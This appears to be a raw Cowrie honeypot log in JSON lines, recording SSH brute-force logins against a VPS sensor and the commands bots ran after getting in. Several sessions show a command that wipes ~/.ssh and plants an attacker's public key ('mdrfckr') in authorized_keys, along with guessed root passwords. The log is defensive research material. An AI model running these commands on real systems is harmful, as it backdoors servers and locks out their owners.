{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:54:40.958018Z","src_ip":"58.144.199.22","session":"9c49a9a79501"}
{"eventid":"cowrie.login.failed","username":"asad","password":"asad","message":"login attempt [asad/asad] failed","sensor":"my-vps","timestamp":"2025-08-26T15:54:41.659064Z","src_ip":"58.144.199.22","session":"9c49a9a79501"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:54:49.667341Z","src_ip":"58.144.199.22","session":"9c49a9a79501"}
{"eventid":"cowrie.session.connect","src_ip":"190.108.76.165","src_port":34619,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7c3940eb456","protocol":"ssh","message":"New connection: 190.108.76.165:34619 (1.2.3.4:22) [session: c7c3940eb456]","sensor":"my-vps","timestamp":"2025-08-26T15:56:38.466066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:56:38.467616Z","src_ip":"190.108.76.165","session":"c7c3940eb456"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:56:38.656014Z","src_ip":"190.108.76.165","session":"c7c3940eb456"}
{"eventid":"cowrie.login.success","username":"root","password":"sunil@123","message":"login attempt [root/sunil@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:56:39.405729Z","src_ip":"190.108.76.165","session":"c7c3940eb456"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:56:39.801679Z","src_ip":"190.108.76.165","session":"c7c3940eb456"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T15:56:39.802375Z","src_ip":"190.108.76.165","session":"c7c3940eb456"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T15:56:39.803563Z","src_ip":"190.108.76.165","session":"c7c3940eb456"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:56:39.993595Z","src_ip":"190.108.76.165","session":"c7c3940eb456"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:56:40.478765Z","src_ip":"190.108.76.165","session":"c7c3940eb456"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T15:56:40.479486Z","src_ip":"190.108.76.165","session":"c7c3940eb456"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T15:56:40.669990Z","src_ip":"190.108.76.165","session":"c7c3940eb456"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:56:40.670969Z","src_ip":"190.108.76.165","session":"c7c3940eb456"}
{"eventid":"cowrie.session.connect","src_ip":"190.108.76.165","src_port":2352,"dst_ip":"1.2.3.4","dst_port":22,"session":"2054c7baab26","protocol":"ssh","message":"New connection: 190.108.76.165:2352 (1.2.3.4:22) [session: 2054c7baab26]","sensor":"my-vps","timestamp":"2025-08-26T15:56:43.865034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:56:43.865857Z","src_ip":"190.108.76.165","session":"2054c7baab26"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:56:44.054737Z","src_ip":"190.108.76.165","session":"2054c7baab26"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T15:56:44.845701Z","src_ip":"190.108.76.165","session":"2054c7baab26"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:56:46.036158Z","src_ip":"190.108.76.165","session":"2054c7baab26"}
{"eventid":"cowrie.session.connect","src_ip":"190.108.76.165","src_port":35298,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4ec75c4c772","protocol":"ssh","message":"New connection: 190.108.76.165:35298 (1.2.3.4:22) [session: c4ec75c4c772]","sensor":"my-vps","timestamp":"2025-08-26T15:56:46.223931Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:56:46.224624Z","src_ip":"190.108.76.165","session":"c4ec75c4c772"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:56:46.413972Z","src_ip":"190.108.76.165","session":"c4ec75c4c772"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:56:47.205140Z","src_ip":"190.108.76.165","session":"c4ec75c4c772"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:56:47.395253Z","src_ip":"190.108.76.165","session":"c7c3940eb456"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:56:47.396225Z","src_ip":"190.108.76.165","session":"c4ec75c4c772"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49229,"dst_ip":"1.2.3.4","dst_port":23,"session":"d09f24ad0804","protocol":"telnet","message":"New connection: 212.227.125.160:49229 (1.2.3.4:23) [session: d09f24ad0804]","sensor":"my-vps","timestamp":"2025-08-26T15:56:57.494981Z"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.201.7","src_port":43612,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e93ec80c3e3","protocol":"ssh","message":"New connection: 14.103.201.7:43612 (1.2.3.4:22) [session: 8e93ec80c3e3]","sensor":"my-vps","timestamp":"2025-08-26T15:57:27.658154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:57:27.659477Z","src_ip":"14.103.201.7","session":"8e93ec80c3e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:57:27.859400Z","src_ip":"14.103.201.7","session":"8e93ec80c3e3"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59456,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb9cbec8284a","protocol":"ssh","message":"New connection: 217.72.205.35:59456 (1.2.3.4:22) [session: eb9cbec8284a]","sensor":"my-vps","timestamp":"2025-08-26T15:57:28.301694Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:57:28.303667Z","src_ip":"217.72.205.35","session":"eb9cbec8284a"}
{"eventid":"cowrie.login.success","username":"root","password":"zzz111","message":"login attempt [root/zzz111] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:57:28.703957Z","src_ip":"14.103.201.7","session":"8e93ec80c3e3"}
{"eventid":"cowrie.session.closed","duration":31.423596620559692,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:57:28.918506Z","src_ip":"212.227.125.160","session":"d09f24ad0804"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:57:29.169459Z","src_ip":"14.103.201.7","session":"8e93ec80c3e3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T15:57:29.170262Z","src_ip":"14.103.201.7","session":"8e93ec80c3e3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T15:57:29.171641Z","src_ip":"14.103.201.7","session":"8e93ec80c3e3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:57:29.372828Z","src_ip":"14.103.201.7","session":"8e93ec80c3e3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:57:30.259124Z","src_ip":"14.103.201.7","session":"8e93ec80c3e3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T15:57:30.259901Z","src_ip":"14.103.201.7","session":"8e93ec80c3e3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T15:57:30.462322Z","src_ip":"14.103.201.7","session":"8e93ec80c3e3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:57:30.463433Z","src_ip":"14.103.201.7","session":"8e93ec80c3e3"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.201.7","src_port":43618,"dst_ip":"1.2.3.4","dst_port":22,"session":"34f91f87b61b","protocol":"ssh","message":"New connection: 14.103.201.7:43618 (1.2.3.4:22) [session: 34f91f87b61b]","sensor":"my-vps","timestamp":"2025-08-26T15:57:30.631718Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:57:30.632730Z","src_ip":"14.103.201.7","session":"34f91f87b61b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:57:30.813581Z","src_ip":"14.103.201.7","session":"34f91f87b61b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T15:57:31.578797Z","src_ip":"14.103.201.7","session":"34f91f87b61b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:57:32.762983Z","src_ip":"14.103.201.7","session":"34f91f87b61b"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.201.7","src_port":43622,"dst_ip":"1.2.3.4","dst_port":22,"session":"817fea471e47","protocol":"ssh","message":"New connection: 14.103.201.7:43622 (1.2.3.4:22) [session: 817fea471e47]","sensor":"my-vps","timestamp":"2025-08-26T15:57:32.971752Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:57:32.972765Z","src_ip":"14.103.201.7","session":"817fea471e47"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:57:33.173433Z","src_ip":"14.103.201.7","session":"817fea471e47"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:57:34.559626Z","src_ip":"14.103.201.7","session":"817fea471e47"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:57:34.761465Z","src_ip":"14.103.201.7","session":"817fea471e47"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:57:34.762761Z","src_ip":"14.103.201.7","session":"8e93ec80c3e3"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":39108,"dst_ip":"1.2.3.4","dst_port":22,"session":"28ce02d6f6be","protocol":"ssh","message":"New connection: 45.88.8.215:39108 (1.2.3.4:22) [session: 28ce02d6f6be]","sensor":"my-vps","timestamp":"2025-08-26T15:57:48.205899Z"}
